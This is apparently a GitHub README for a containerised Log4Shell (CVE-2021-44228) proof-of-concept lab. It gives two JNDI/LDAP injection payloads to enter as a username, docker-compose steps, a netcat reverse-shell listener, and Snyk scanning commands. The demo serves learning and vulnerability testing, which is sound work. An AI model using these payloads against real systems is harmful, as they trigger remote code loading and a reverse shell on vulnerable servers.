Skip to content

andreabrambilla/log4shell-demo

 
 

Repository files navigation

Log4shell proof of concept

Proof of concept for CVE-2021-44228. To learn more about log4shell, check the summary by Snyk.

To start all containers

docker-compose up

Exploit 1:

Go go localhost:8080 and fill username:

${jndi:ldap://exploit:9999/Evil}

Exploit 2:

${jndi:ldap://reverse-shell:1389/a}

Snyk

snyk log4shell
snyk test --all-projects

Shell 1

Start terminal in web-server

docker-compose up web-server

Shell 2

docker-compose up exploit
docker-compose up reverse-shell

Shell 3

Check web server to see if exploit worked:

docker-compose exec web-server bash

Shell 4

Start terminal in ubuntu and listen for reverse shell:

docker-compose up -d ubuntu
docker-compose exec ubuntu bash
nc -lv 9001

Credit

This PoC is heavily based on these resources:

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 73.5%
  • Python 23.0%
  • Dockerfile 3.5%